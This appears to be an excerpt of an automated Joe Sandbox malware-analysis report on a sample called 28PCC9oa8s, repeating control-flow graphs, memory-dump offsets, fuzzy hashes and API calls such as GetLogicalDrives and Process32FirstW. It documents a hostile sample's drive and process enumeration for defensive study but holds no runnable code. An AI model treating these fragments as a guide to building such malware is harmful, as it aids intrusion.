                                                            control_flow_graph 172 6db099d-6db09a5 173 6db09f3-6db09fc 172->173 174 6db09a7-6db09fa 172->174 176 6db09fe-6db0d59 call 6db0bef 173->176 184 6db0999-6db099b 174->184 185 6db09fc 174->185 220 6db0d5f-6db0d79 GetLogicalDrives 176->220 184->172 185->176 221 6db0d84-6db0dd0 call 6db0ddc 220->221 225 6db0dd5-6db0de5 call 6db0deb 221->225 228 6db0de7-6db0de9 225->228 229 6db0dc6-6db0dcf 225->229 229->225 230 6db0dd0 call 6db0ddc 229->230 230->225
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\
                                                            • API String ID: 0-3379428675
                                                            • Opcode ID: 28507c8846350216a4ef81b3de169a8f6bd8e737d1026218c5715f3e20548de6
                                                            • Instruction ID: e22c1d0592c3b75aa532b37d04c02a8c2f78077ccb39cbb3d384d6531eb122bb
                                                            • Opcode Fuzzy Hash: 28507c8846350216a4ef81b3de169a8f6bd8e737d1026218c5715f3e20548de6
                                                            • Instruction Fuzzy Hash: 1051F4EB54C211FD738291952F14EFBAB7EE5C3730730A83AF483C664AE6D48A4951B1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 231 6db09e3-6db0d59 call 6db0bef 271 6db0d5f-6db0d79 GetLogicalDrives 231->271 272 6db0d84-6db0dd0 call 6db0ddc 271->272 276 6db0dd5-6db0de5 call 6db0deb 272->276 279 6db0de7-6db0de9 276->279 280 6db0dc6-6db0dcf 276->280 280->276 281 6db0dd0 call 6db0ddc 280->281 281->276
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 46dd996773a82291ffaeb760ec2af768e886af43e9fdccd265c5e3a08649a3aa
                                                            • Instruction ID: eae45efabf493eed96520b2550a17960a2dcfc72d9307129d46e446b23ad8243
                                                            • Opcode Fuzzy Hash: 46dd996773a82291ffaeb760ec2af768e886af43e9fdccd265c5e3a08649a3aa
                                                            • Instruction Fuzzy Hash: 3951A0EB14C111FD738291852B14EFB6B7EE5D2730730A83AF487C664AE6D48A4A51B1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 282 6db0a13-6db0d59 call 6db0bef 321 6db0d5f-6db0d79 GetLogicalDrives 282->321 322 6db0d84-6db0dd0 call 6db0ddc 321->322 326 6db0dd5-6db0de5 call 6db0deb 322->326 329 6db0de7-6db0de9 326->329 330 6db0dc6-6db0dcf 326->330 330->326 331 6db0dd0 call 6db0ddc 330->331 331->326
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 4805b20c3b218e1f31e47d7ba7cdee062f9539f6e037218de08a6f8c2e69d9b5
                                                            • Instruction ID: 52e7238df6c70b5d8072395039c25b9de21090f868f31872a9e35644af6df6ba
                                                            • Opcode Fuzzy Hash: 4805b20c3b218e1f31e47d7ba7cdee062f9539f6e037218de08a6f8c2e69d9b5
                                                            • Instruction Fuzzy Hash: C351D3EB14C111FD738291852F14EFB6B7EE5C3730730A83AF483C6A4AE6D48A4A11B1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 332 6db0a24-6db0d59 call 6db0bef 368 6db0d5f-6db0d79 GetLogicalDrives 332->368 369 6db0d84-6db0dd0 call 6db0ddc 368->369 373 6db0dd5-6db0de5 call 6db0deb 369->373 376 6db0de7-6db0de9 373->376 377 6db0dc6-6db0dcf 373->377 377->373 378 6db0dd0 call 6db0ddc 377->378 378->373
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 3f7c75d9b8cd6528c088cc269721c7a690ea6b0af149c958460726faa71405fb
                                                            • Instruction ID: 2b5d8b221dab89d6d731ad6ca733ec6b53ae54d23ee62a0440215c8d15be9cf6
                                                            • Opcode Fuzzy Hash: 3f7c75d9b8cd6528c088cc269721c7a690ea6b0af149c958460726faa71405fb
                                                            • Instruction Fuzzy Hash: 8F51D4EB14C211FD738291952F14EFB6B7EE5D3730730A43AF487C664AE6D48A4911B1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 379 6db0a3e-6db0a40 380 6db0a6d-6db0d59 call 6db0bef 379->380 381 6db0a42-6db0a6c 379->381 415 6db0d5f-6db0d79 GetLogicalDrives 380->415 381->380 416 6db0d84-6db0dd0 call 6db0ddc 415->416 420 6db0dd5-6db0de5 call 6db0deb 416->420 423 6db0de7-6db0de9 420->423 424 6db0dc6-6db0dcf 420->424 424->420 425 6db0dd0 call 6db0ddc 424->425 425->420
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\
                                                            • API String ID: 0-3379428675
                                                            • Opcode ID: 762852a67367e12250a3f31c936c9b4b4663691b3bf0d6b3dedfae4de681e1f8
                                                            • Instruction ID: 10d092a5f08cbd5ac6ad36f4821a49986b9b05955f3188c012f5a436303d4a50
                                                            • Opcode Fuzzy Hash: 762852a67367e12250a3f31c936c9b4b4663691b3bf0d6b3dedfae4de681e1f8
                                                            • Instruction Fuzzy Hash: B55106EB14C211FD738291952F14EFB6B7EE5C3730730A43AF483C6A4AE6D48A4A11B1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 426 6db0a5b-6db0d59 call 6db0bef 460 6db0d5f-6db0d79 GetLogicalDrives 426->460 461 6db0d84-6db0dd0 call 6db0ddc 460->461 465 6db0dd5-6db0de5 call 6db0deb 461->465 468 6db0de7-6db0de9 465->468 469 6db0dc6-6db0dcf 465->469 469->465 470 6db0dd0 call 6db0ddc 469->470 470->465
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 9d5dd60d9802dfef50bc12168cb12c0264e55bcb738053b6c7c09c767a260cbd
                                                            • Instruction ID: 76a1ec40d86a9284feb1509c779766a8f4b932fc959615074c23b126e8489438
                                                            • Opcode Fuzzy Hash: 9d5dd60d9802dfef50bc12168cb12c0264e55bcb738053b6c7c09c767a260cbd
                                                            • Instruction Fuzzy Hash: A151F5EB14C121FD738291852F54AFB6B7EE5C3730730A43AF443C664AE7D48A4911B1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 471 6db0a84-6db0d59 call 6db0bef 504 6db0d5f-6db0d79 GetLogicalDrives 471->504 505 6db0d84-6db0dd0 call 6db0ddc 504->505 509 6db0dd5-6db0de5 call 6db0deb 505->509 512 6db0de7-6db0de9 509->512 513 6db0dc6-6db0dcf 509->513 513->509 514 6db0dd0 call 6db0ddc 513->514 514->509
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: a7b1f56b1fd988e26803f4a458a104585d9669e9febbc44f6a19db5ba35b6653
                                                            • Instruction ID: 85da672b0e7acaadfec16088901e9c3c39a3fb2b53cada42c49598a75f56f987
                                                            • Opcode Fuzzy Hash: a7b1f56b1fd988e26803f4a458a104585d9669e9febbc44f6a19db5ba35b6653
                                                            • Instruction Fuzzy Hash: 4751D4EB54C111FD738291852F10EFB6B7EE5D3730730A43AF483C6A4AE6D48A4A11B1

                                                            Control-flow Graph

                                                            control_flow_graph 515 6db0a9d-6db0d59 call 6db0bef 545 6db0d5f-6db0d79 GetLogicalDrives 515->545 546 6db0d84-6db0dd0 call 6db0ddc 545->546 550 6db0dd5-6db0de5 call 6db0deb 546->550 553 6db0de7-6db0de9 550->553 554 6db0dc6-6db0dcf 550->554 554->550 555 6db0dd0 call 6db0ddc 554->555 555->550
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675

                                                            Control-flow Graph

                                                            control_flow_graph 598 6db0afd-6db0b0f 599 6db0aae-6db0af7 598->599 600 6db0b10-6db0d59 call 6db0bef 598->600 599->600 629 6db0d5f-6db0d79 GetLogicalDrives 600->629 630 6db0d84-6db0dd0 call 6db0ddc 629->630 634 6db0dd5-6db0de5 call 6db0deb 630->634 637 6db0de7-6db0de9 634->637 638 6db0dc6-6db0dcf 634->638 638->634 639 6db0dd0 call 6db0ddc 638->639 639->634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\
                                                            • API String ID: 0-3379428675

                                                            Control-flow Graph

                                                            control_flow_graph 556 6db0a90-6db0d59 call 6db0bef 587 6db0d5f-6db0d79 GetLogicalDrives 556->587 588 6db0d84-6db0dd0 call 6db0ddc 587->588 592 6db0dd5-6db0de5 call 6db0deb 588->592 595 6db0de7-6db0de9 592->595 596 6db0dc6-6db0dcf 592->596 596->592 597 6db0dd0 call 6db0ddc 596->597 597->592
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675

                                                            Control-flow Graph

                                                            control_flow_graph 640 6db0b20-6db0b29 641 6db0b2b-6db0b2d 640->641 642 6db0ac4-6db0b1b 640->642 644 6db0b2f-6db0d59 call 6db0bef 641->644 642->644 670 6db0d5f-6db0d79 GetLogicalDrives 644->670 671 6db0d84-6db0dd0 call 6db0ddc 670->671 675 6db0dd5-6db0de5 call 6db0deb 671->675 678 6db0de7-6db0de9 675->678 679 6db0dc6-6db0dcf 675->679 679->675 680 6db0dd0 call 6db0ddc 679->680 680->675
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\
                                                            • API String ID: 0-3379428675

                                                            Control-flow Graph

                                                            control_flow_graph 681 6db0ab8-6db0d59 call 6db0bef 710 6db0d5f-6db0d79 GetLogicalDrives 681->710 711 6db0d84-6db0dd0 call 6db0ddc 710->711 715 6db0dd5-6db0de5 call 6db0deb 711->715 718 6db0de7-6db0de9 715->718 719 6db0dc6-6db0dcf 715->719 719->715 720 6db0dd0 call 6db0ddc 719->720 720->715
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675

                                                            Control-flow Graph

                                                            control_flow_graph 721 6db0ad1-6db0d59 call 6db0bef 748 6db0d5f-6db0d79 GetLogicalDrives 721->748 749 6db0d84-6db0dd0 call 6db0ddc 748->749 753 6db0dd5-6db0de5 call 6db0deb 749->753 756 6db0de7-6db0de9 753->756 757 6db0dc6-6db0dcf 753->757 757->753 758 6db0dd0 call 6db0ddc 757->758 758->753
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\
                                                            • API String ID: 0-3379428675
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$`
                                                            • API String ID: 0-2009773055
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
